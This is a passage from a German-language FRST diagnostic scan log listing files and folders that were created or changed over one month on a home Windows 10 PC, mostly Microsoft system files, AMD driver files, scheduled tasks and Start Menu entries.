2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-23 18:30 - 02078284 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-23 18:25 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-23 18:24 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-23 18:30 - 2017-03-20 06:41 - 00924424 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-23 18:30 - 2017-03-20 06:41 - 00197434 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-23 18:29 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM
2017-05-23 18:25 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-23 18:25 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-23 18:25 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-23 18:24 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-23 18:24 - 2017-02-05 21:38 - 00018061 _____ C:\bdlog.txt
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-23 17:51 - 2015-05-01 17:30 - 132223576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-23 17:51 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
